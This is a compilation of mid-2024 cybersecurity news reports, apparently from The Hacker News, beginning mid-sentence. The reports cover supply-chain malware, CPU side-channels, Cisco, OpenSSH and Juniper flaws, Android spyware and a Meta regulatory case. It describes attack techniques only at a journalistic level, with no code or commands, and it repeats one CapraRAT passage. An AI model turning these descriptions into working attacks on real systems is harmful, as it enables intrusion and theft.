Cobalt Strike alternative called Sliver.
"The operators also put some notable efforts in acquiring dedicated infrastructure and deploying a realistic WordPress website to deliver payloads," the researchers said. "Overall, this campaign feels like it could realistically be the work of a small team."
The end goal of the campaign is currently unknown, although HarfangLab theorized
that it could also be associated with a legitimate penetration testing
operation, a possibility that raises its own set of questions surrounding
transparency and the need for impersonating Israeli government agencies.
The disclosure comes as the SonicWall Capture Labs threat research team detailed an infection chain that employs booby-trapped Excel spreadsheets as a starting point to drop a trojan known as Orcinius.
"This is a multi-stage trojan that is using Dropbox and Google Docs to download second-stage payloads and stay updated," the company said. "It contains an obfuscated VBA macro that hooks into Windows to monitor running windows and keystrokes and creates persistence using registry keys."
South Korean ERP Vendor's Server
Hacked to Spread Xctdoor Malware
3.7.24
Virus
The Hacker News
An unnamed South Korean enterprise resource planning (ERP) vendor's product
update server has been found to be compromised to deliver a Go-based backdoor
dubbed Xctdoor.
The AhnLab Security Intelligence Center (ASEC), which identified the attack in May 2024, did not attribute it to a known threat actor or group, but noted that the tactics overlap with that of Andariel, a sub-cluster within the infamous Lazarus Group.
The similarities stem from the North Korean adversary's
prior use of the ERP solution to distribute malware like HotCroissant – which is
identical to Rifdoor – in 2017 by inserting a malicious routine into a software
update program.
In the recent incident analyzed by ASEC, the same executable is said to have
been tampered with to execute a DLL file from a specific path using the
regsvr32.exe process as opposed to launching a downloader.
The DLL file, Xctdoor, is capable of stealing system information, including keystrokes, screenshots, and clipboard content, and executing commands issued by the threat actor.
"Xctdoor communicates with the [command-and-control] server using the HTTP protocol, while the packet encryption employs the Mersenne Twister (MT19937) algorithm and the Base64 algorithm," ASEC said.
Also used in the attack is a malware called XcLoader, which serves as an injector malware responsible for injecting Xctdoor into legitimate processes (e.g., "explorer.exe").
ASEC said it further detected cases where poorly secured web servers have been compromised to install XcLoader since at least March 2024.
The development comes as the another North Korea-linked
threat actor referred to as Kimusky has been observed employing a previously
undocumented backdoor codenamed HappyDoor that has been put to use as far back
as July 2021.
Attack chains distributing the malware leverage spear-phishing emails as a
starting point to disseminate a compressed file, which contains an obfuscated
JavaScript or dropper that, when executed, creates and runs HappyDoor alongside
a decoy file.
HappyDoor, a DLL file executed via regsvr32.exe, is equipped to communicate with a remote server over HTTP and facilitate information theft, download/upload files, as well as update and terminate itself.
It also follows a "massive" malware distribution campaign orchestrated by the Konni cyber espionage group (aka Opal Sleet, Osmium, or TA406) targeting South Korea with phishing lures impersonating the national tax service to deliver malware capable of stealing sensitive information, security researcher Idan Tarab said.
New Intel CPU Vulnerability
'Indirector' Exposes Sensitive Data
2.7.24
Attack
The Hacker News
Modern CPUs from Intel, including Raptor Lake and Alder Lake, have been found
vulnerable to a new side-channel attack that could be exploited to leak
sensitive information from the processors.
The attack, codenamed Indirector by security researchers Luyi Li, Hosein Yavarzadeh, and Dean Tullsen, leverages shortcomings identified in Indirect Branch Predictor (IBP) and the Branch Target Buffer (BTB) to bypass existing defenses and compromise the security of the CPUs.
"The Indirect Branch Predictor (IBP) is a hardware component in modern CPUs that predicts the target addresses of indirect branches," the researchers noted.
"Indirect branches are control flow instructions whose target address is
computed at runtime, making them challenging to predict accurately. The IBP uses
a combination of global history and branch address to predict the target address
of indirect branches."
The idea, at its core, is to identify vulnerabilities in IBP to launch precise
Branch Target Injection (BTI) attacks – aka Spectre v2 (CVE-2017-5715) – which
target a processor's indirect branch predictor to result in unauthorized
disclosure of information to an attacker with local user access via a
side-channel.
This is accomplished by means of a custom tool called iBranch Locator that's used to locate any indirect branch, followed by carrying out precision targeted IBP and BTP injections to perform speculative execution.
Intel, which was made aware of the findings in February 2024, has since informed other affected hardware/software vendors about the issue.
As mitigations, it's recommended to make use of the Indirect Branch Predictor Barrier (IBPB) more aggressively and harden the Branch Prediction Unit (BPU) design by incorporating more complex tags, encryption, and randomization.
The research comes as Arm CPUs have been found susceptible to a speculative execution attack of their own called TIKTAG that targets the Memory Tagging Extension (MTE) to leak data with over a 95% success rate in less than four seconds.
The study "identifies new TikTag gadgets capable of leaking the MTE tags from arbitrary memory addresses through speculative execution," researchers Juhee Kim, Jinbum Park, Sihyeon Roh, Jaeyoung Chung, Youngjoo Lee, Taesoo Kim, and Byoungyoung Lee said.
"With TikTag gadgets, attackers can bypass the probabilistic defense of MTE, increasing the attack success rate by close to 100%."
In response to the disclosure, Arm said "MTE can provide a limited set of deterministic first line defenses, and a broader set of probabilistic first line defenses, against specific classes of exploits."
"However, the probabilistic properties are not designed to be a full solution against an interactive adversary that is able to brute force, leak, or craft arbitrary Address Tags."
Meta's 'Pay or Consent' Approach Faces E.U. Competition Rules Scrutiny
2.7.24
Social
The Hacker News
Meta's decision to offer an ad-free subscription in the European Union (E.U.)
has faced a new setback after regulators accused the social media behemoth of
breaching the bloc's competition rules by forcing users to choose between seeing
ads or paying to avoid them.
The European Commission said the company's "pay or consent" advertising model is in contravention of the Digital Markets Act (DMA).
"This binary choice forces users to consent to the combination of their personal data and fails to provide them a less personalized but equivalent version of Meta's social networks," the Commission said.
It also noted that companies in gatekeeper roles must seek users' permission to combine their personal data between designated core platform services and other services (e.g., advertising) and that users who refuse to opt in should have access to a less personalized but equivalent alternative.
On top of that, Meta's approach does not allow users to choose a service that uses less of their personal data, stating it doesn't permit users to exercise their right to freely consent to combine their data from its services to target them with personalized online ads, the Commission said.
"Users who do not consent should still get access to an equivalent service which uses less of their personal data, in this case for the personalisation of advertising," it added.
Meta first announced its plans for an ad-free option to access Facebook and Instagram for users in the E.U., European Economic Area (EEA), and Switzerland in October 2023 as a way to comply with the strict privacy laws in the region.
But in the intervening months, the American tech giant has faced criticism for essentially not offering real choices for customers to opt from, instead forcing them to either consent to tracking for advertising purposes or pay up every month to avoid seeing personalized ads altogether.
"European users now have the 'choice' to either consent to being tracked for personalized advertising – or pay up to €251.88 a year to retain their fundamental right to data protection on Instagram and Facebook," Austrian privacy non-profit noyb said late last year.
"Not only is the cost unacceptable, but industry numbers suggest that only 3 percent of people want to be tracked – while more than 99 percent decide against a payment when faced with a 'privacy fee.'"
Should the preliminary findings be confirmed, Meta could be fined up to 10% of its total worldwide turnover, a number that can go up to 20% for systematic infringement of the rules.
"Subscription for no ads follows the direction of the highest court in Europe and complies with the DMA," Meta was quoted as saying in a statement shared with the Associated Press. It further said it will engage in "constructive dialogue" with the Commission as part of the investigation.
The development comes as a Norwegian court has confirmed that online dating app Grindr violated GDPR data protection laws in the E.U. by sharing user data with advertisers, requiring it to pay a fine of €5.7 million ($6.1 million).
Chinese Hackers Exploiting Cisco
Switches Zero-Day to Deliver Malware
2.7.24
Vulnerebility
The Hacker News
A China-nexus cyber espionage group named Velvet Ant has been observed
exploiting a zero-day flaw in Cisco NX-OS Software used in its switches to
deliver malware.
The vulnerability, tracked as CVE-2024-20399 (CVSS score: 6.0), concerns a case of command injection that allows an authenticated, local attacker to execute arbitrary commands as root on the underlying operating system of an affected device.
"By exploiting this vulnerability, Velvet Ant successfully executed a previously unknown custom malware that allowed the threat group to remotely connect to compromised Cisco Nexus devices, upload additional files, and execute code on the devices," cybersecurity firm Sygnia said in a statement shared with The Hacker News.
Cisco said the issue stems from insufficient validation of arguments that are passed to specific configuration CLI commands, which could be exploited by an adversary by including crafted input as the argument of an affected configuration CLI command.
What's more, it enables a user with Administrator privileges to execute commands without triggering system syslog messages, thereby making it possible to conceal the execution of shell commands on hacked appliances.
Despite the code execution capabilities of the flaw, the lower severity is due to the fact that successful exploitation requires an attacker to be already in possession of administrator credentials and have access to specific configuration commands. The following devices are impacted by CVE-2024-20399 -
MDS 9000 Series Multilayer Switches
Nexus 3000 Series Switches
Nexus 5500 Platform Switches
Nexus 5600 Platform Switches
Nexus 6000 Series Switches
Nexus 7000 Series Switches, and
Nexus 9000 Series Switches in standalone NX-OS mode
Velvet Ant was first documented by the Israeli cybersecurity firm last month in
connection with a cyber attack targeting an unnamed organization located in East
Asia for a period of about three years by establishing persistence using
outdated F5 BIG-IP appliances in order to stealthily steal customer and
financial information.
"Network appliances, particularly switches, are often not monitored, and their logs are frequently not forwarded to a centralized logging system," Sygnia said. "This lack of monitoring creates significant challenges in identifying and investigating malicious activities."
The development comes as threat actors are exploiting a critical vulnerability affecting D-Link DIR-859 Wi-Fi routers (CVE-2024-0769, CVSS score: 9.8) – a path traversal issue leading to information disclosure – to gather account information such as names, passwords, groups, and descriptions for all users.
"The exploit's variations [...] enable the extraction of account details from the device," threat intelligence firm GreyNoise said. "The product is End-of-Life, so it won't be patched, posing long-term exploitation risks. Multiple XML files can be invoked using the vulnerability."
Australian Man Charged for Fake
Wi-Fi Scam on Domestic Flights
2.7.24
Hacking
The Hacker News
An Australian man has been charged with running a fake Wi-Fi access point during
a domestic flight with an aim to steal user credentials and data.
The unnamed 42-year-old "allegedly established fake free Wi-Fi access points, which mimicked legitimate networks, to capture personal data from unsuspecting victims who mistakenly connected to them," the Australian Federal Police (AFP) said in a press release last week.
The agency said the suspect was charged in May 2024 after it launched an investigation a month earlier following a report from an airline about a suspicious Wi-Fi network identified by its employees during a domestic flight.
A subsequent search of his baggage on April 19 led to the seizure of a portable wireless access device, a laptop, and a mobile phone. He was arrested on May 8 after a search warrant was executed at his home.
The individual is said to have staged what's called an evil twin Wi-Fi attack across various locations, including domestic flights and airports in Perth, Melbourne, and Adelaide, to impersonate legitimate Wi-Fi networks.
Users who attempted to connect to the free, phony network were prompted to enter their email address or social media credentials through a captive portal web page.
"The email and password details harvested could be used to access more personal information, including a victim's online communications, stored images and videos, or bank details," the AFP said.
The defendant has been charged with three counts of unauthorized impairment of electronic communication and three counts of possession or control of data with the intent to commit a serious offense.
He has also been charged with one count of unauthorized access or modification of restricted data, one count of dishonestly obtaining or dealing in personal financial information, and one count of possession of identification information. If convicted, he faces up to a maximum of 23 years in prison.
"To connect to a free Wi-Fi network, you shouldn't have to enter any personal details -- such as logging in through an email or social media account," AFP Western Command Cybercrime Detective Inspector Andrea Coleman said.
"If you do want to use public Wi-Fi hotspots, install a reputable virtual private network (VPN) on your devices to encrypt and secure your data when using the internet."
Critical Flaws in CocoaPods Expose
iOS and macOS Apps to Supply Chain Attacks
2.7.24
Vulnerebility
The Hacker News
A trio of security flaws has been uncovered in the CocoaPods dependency manager
for Swift and Objective-C Cocoa projects that could be exploited to stage
software supply chain attacks, putting downstream customers at severe risks.
The vulnerabilities allow "any malicious actor to claim ownership over thousands of unclaimed pods and insert malicious code into many of the most popular iOS and macOS applications," E.V.A Information Security researchers Reef Spektor and Eran Vaknin said in a report published today.
The Israeli application security firm said the three issues have since been patched by CocoaPods as of October 2023. It also resets all user sessions at the time in response to the disclosures.
One of the vulnerabilities is CVE-2024-38368 (CVSS score: 9.3), which makes it possible for an attacker to abuse the "Claim Your Pods" process and take control of a package, effectively allowing them to tamper with the source code and introduce malicious changes. However, this required that all prior maintainers have been removed from the project.
The roots of the problem go back to 2014, when a migration to the Trunk server left thousands of packages with unknown (or unclaimed) owners, permitting an attacker to use a public API for claiming pods and an email address that was available in the CocoaPods source code ("unclaimed-pods@cocoapods.org") to take over control.
The second bug is even more critical (CVE-2024-38366, CVSS
score: 10.0) and takes advantage of an insecure email verification workflow to
run arbitrary code on the Trunk server, which could then be used to manipulate
or replace the packages.
Also identified in the service is a second problem in the email address verification component (CVE-2024-38367, CVSS score: 8.2) that could entice a recipient into clicking on a seemingly-benign verification link, when, in reality, it reroutes the request to an attacker-controlled domain in order to gain access to a developer's session tokens.
Making matters worse, this can be upgraded into a zero-click account takeover attack by spoofing an HTTP header – i.e., modifying the X-Forwarded-Host header field – and taking advantage of misconfigured email security tools.
"We have found that almost every pod owner is registered with their organizational email on the Trunk server, which makes them vulnerable to our zero-click takeover vulnerability," the researchers said.
This is not the first time CocoaPods has come under the scanner. In March 2023, Checkmarx revealed that an abandoned sub-domain associated with the dependency manager ("cdn2.cocoapods[.]org") could have been hijacked by an adversary via GitHub Pages with an aim to host their payloads.
CapraRAT Spyware Disguised as Popular Apps Threatens Android Users
1.7.24
Virus
The Hacker News
The threat actor known as Transparent Tribe has continued to unleash
malware-laced Android apps as part of a social engineering campaign to target
individuals of interest.
"These APKs continue the group's trend of embedding spyware into curated video browsing applications, with a new expansion targeting mobile gamers, weapons enthusiasts, and TikTok fans," SentinelOne security researcher Alex Delamotte said in a new report shared with The Hacker News.
The campaign, dubbed CapraTube, was first outlined by the cybersecurity company in September 2023, with the hacking crew employing weaponized Android apps impersonating legitimate apps like YouTube to deliver a spyware called CapraRAT, a modified version of AndroRAT with capabilities to capture a wide range of sensitive data.
Transparent Tribe, suspected to be of Pakistan origin, has leveraged CapraRAT for over two years in attacks targeting the Indian government and military personnel. The group has a history of leaning into spear-phishing and watering hole attacks to deliver a variety of Windows and Android spyware.
"The activity highlighted in this report shows the continuation of this technique with updates to the social engineering pretexts as well as efforts to maximize the spyware's compatibility with older versions of the Android operating system while expanding the attack surface to include modern versions of Android," Delamotte explained.
The list of new malicious APK files identified by SentinelOne is as follows -
Crazy Game (com.maeps.crygms.tktols)
Sexy Videos (com.nobra.crygms.tktols)
TikToks (com.maeps.vdosa.tktols)
Weapons (com.maeps.vdosa.tktols)
CapraRAT uses WebView to launch a URL to either YouTube or a mobile gaming site
named CrazyGames[.]com, while, in the background, it abuses its permissions to
access locations, SMS messages, contacts, and call logs; make phone calls; take
screenshots; or record audio and video.
A notable change to the malware is that permissions such as READ_INSTALL_SESSIONS, GET_ACCOUNTS, AUTHENTICATE_ACCOUNTS, and REQUEST_INSTALL_PACKAGES are no longer requested, suggesting that the threat actors are aiming to use it as a surveillance tool than a backdoor.
"The updates to the CapraRAT code between the September 2023 campaign and the current campaign are minimal, but suggest the developers are focused on making the tool more reliable and stable," Delamotte said.
"The decision to move to newer versions of the Android OS are logical, and likely align with the group's sustained targeting of individuals in the Indian government or military space, who are unlikely to use devices running older versions of Android, such as Lollipop which was released 8 years ago."
The disclosure comes as Promon disclosed a novel type of Android banking malware called Snowblind that, in ways similar to FjordPhantom, attempts to bypass detection methods and make use of the operating system's accessibility services API in a surreptitious manner.
"Snowblind [...] performs a normal repackaging attack but uses a lesser-known technique based on seccomp that is capable of bypassing many anti-tampering mechanisms," the company said.
"Interestingly, FjordPhantom and Snowblind target apps from Southeast Asia and leverage powerful new attack techniques. That seems to indicate that malware authors in that region have become extremely sophisticated."
Cybersecurity
"The updates to the CapraRAT code between the September 2023 campaign and the
current campaign are minimal, but suggest the developers are focused on making
the tool more reliable and stable," Delamotte said.
"The decision to move to newer versions of the Android OS are logical, and likely align with the group's sustained targeting of individuals in the Indian government or military space, who are unlikely to use devices running older versions of Android, such as Lollipop which was released 8 years ago."
The disclosure comes as Promon disclosed a novel type of Android malware called Snowblind that, in ways similar to FjordPhantom, attempts to bypass detection methods and make use of the operating system's accessibility services API in a surreptitious manner.
"Snowblind [...] performs a normal repackaging attack but uses a lesser-known technique based on seccomp that is capable of bypassing many anti-tampering mechanisms," the company said.
"Interestingly, FjordPhantom and Snowblind target apps from Southeast Asia and leverage powerful new attack techniques. That seems to indicate that malware authors in that region have become extremely sophisticated."
Indian Software Firm's Products
Hacked to Spread Data-Stealing Malware
1.7.24
Virus
The Hacker News
Installers for three different software products developed by an Indian company
named Conceptworld have been trojanized to distribute information-stealing
malware.
The installers correspond to Notezilla, RecentX, and Copywhiz, according to cybersecurity firm Rapid7, which discovered the supply chain compromise on June 18, 2024. The issue has since been remediated by Conceptworld as of June 24 within 12 hours of responsible disclosure.
"The installers had been trojanized to execute information-stealing malware that has the capability to download and execute additional payloads," the company said, adding the malicious versions had a larger file size than their legitimate counterparts.
Specifically, the malware is equipped to steal browser credentials and cryptocurrency wallet information, log clipboard contents and keystrokes, and download and execute additional payloads on infected Windows hosts. It also sets up persistence using a scheduled task to execute the main payload every three hours.
It's currently not clear how the official domain "conceptworld[.]com" was breached to stage the counterfeit installers. However, once installed, the user is prompted to proceed with the installation process associated with the actual software, while it's also designed to drop and execute a binary "dllCrt32.exe" that's responsible for running a batch script "dllCrt.bat."
Besides establishing persistence on the machine, it's configured to execute another file ("dllBus32.exe"), which, in turn, establishes connections with a command-and-control (C2) server and incorporates functionality to steal sensitive data as well as retrieve and run more payloads.
This includes gathering credentials and other information from Google Chrome, Mozilla Firefox, and multiple cryptocurrency wallets (e.g., Atomic, Coinomi, Electrum, Exodus, and Guarda). It's also capable of harvesting files matching a specific set of extensions (.txt, .doc, .png, and .jpg), logging keystrokes, and grabbing clipboard contents.
"The malicious installers observed in this case are unsigned and have a file size that is inconsistent with copies of the legitimate installer," Rapid7 said.
Users who have downloaded an installer for Notezilla, RecentX, or Copywhiz in June 2024 are recommended to examine their systems for signs of compromise and take appropriate action – such as re-imaging the affected ones – to undo the nefarious modifications.
New OpenSSH Vulnerability Could Lead
to RCE as Root on Linux Systems
1.7.24
Vulnerebility
The Hacker News
OpenSSH maintainers have released security updates to contain a critical
security flaw that could result in unauthenticated remote code execution with
root privileges in glibc-based Linux systems.
The vulnerability has been assigned the CVE identifier CVE-2024-6387. It resides in the OpenSSH server component, also known as sshd, which is designed to listen for connections from any of the client applications.
"The vulnerability, which is a signal handler race condition in OpenSSH's server (sshd), allows unauthenticated remote code execution (RCE) as root on glibc-based Linux systems," Bharat Jogi, senior director of the threat research unit at Qualys, said in a disclosure published today. "This race condition affects sshd in its default configuration."
The cybersecurity firm said it identified no less than 14 million potentially vulnerable OpenSSH server instances exposed to the internet, adding it's a regression of an already patched 18-year-old flaw tracked as CVE-2006-5051, with the problem reinstated in October 2020 as part of OpenSSH version 8.5p1.
"Successful exploitation has been demonstrated on 32-bit Linux/glibc systems with [address space layout randomization]," OpenSSH said in an advisory. "Under lab conditions, the attack requires on average 6-8 hours of continuous connections up to the maximum the server will accept."
The vulnerability impacts versions between 8.5p1 and 9.7p1. Versions prior 4.4p1 are also vulnerable to the race condition bug unless they are patched for CVE-2006-5051 and CVE-2008-4109. It's worth noting that OpenBSD systems are unaffected as they include a security mechanism that blocks the flaw.
Specifically, Qualys found that if a client does not authenticate within 120 seconds (a setting defined by LoginGraceTime), then sshd's SIGALRM handler is called asynchronously in a manner that's not async-signal-safe.
The net effect of exploiting CVE-2024-6387 is full system compromise and takeover, enabling threat actors to execute arbitrary code with the highest privileges, subvert security mechanisms, data theft, and even maintain persistent access.
"A flaw, once fixed, has reappeared in a subsequent software release, typically due to changes or updates that inadvertently reintroduce the issue," Jogi said. "This incident highlights the crucial role of thorough regression testing to prevent the reintroduction of known vulnerabilities into the environment."
While the vulnerability has significant roadblocks due to its remote race condition nature, users are recommended to apply the latest patches to secure against potential threats. It's also advised to limit SSH access through network-based controls and enforce network segmentation to restrict unauthorized access and lateral movement.
Juniper Networks Releases Critical
Security Update for Routers
1.7.24
Vulnerebility
The Hacker News
Juniper Networks has released out-of-band security updates to address a critical
security flaw that could lead to an authentication bypass in some of its
routers.
The vulnerability, tracked as CVE-2024-2973, carries a CVSS score of 10.0, indicating maximum severity.
"An Authentication Bypass Using an Alternate Path or Channel vulnerability in Juniper Networks Session Smart Router or Conductor running with a redundant peer allows a network based attacker to bypass authentication and take full control of the device," the company said in an advisory issued last week.
According to Juniper Networks, the shortcoming affects only those routers or conductors that are running in high-availability redundant configurations. The list of impacted devices is listed below -
Session Smart Router (all versions before 5.6.15, from 6.0
before 6.1.9-lts, and from 6.2 before 6.2.5-sts)
Session Smart Conductor (all versions before 5.6.15, from 6.0 before 6.1.9-lts,
and from 6.2 before 6.2.5-sts)
WAN Assurance Router (6.0 versions before 6.1.9-lts and 6.2 versions before
6.2.5-sts)
The networking equipment maker, which was bought out by Hewlett Packard
Enterprise (HPE) for approximately $14 billion earlier this year, said it found
no evidence of active exploitation of the flaw in the wild.
It also said that it discovered the vulnerability during internal product testing and that there are no workarounds that resolve the issue.
"This vulnerability has been patched automatically on affected devices for MIST managed WAN Assurance routers connected to the Mist Cloud," it further noted. "It is important to note that the fix is applied automatically on managed routers by a Conductor or on WAN assurance routers has no impact on data-plane functions of the router."
In January 2024, the company also rolled out fixes for a critical vulnerability in the same products (CVE-2024-21591, CVSS score: 9.8) that could enable an attacker to cause a denial-of-service (DoS) or remote code execution and obtain root privileges on the devices.
With multiple security flaws affecting the company's SRX firewalls and EX switches weaponized by threat actors last year, it's essential that users apply the patches to protect against potential threats.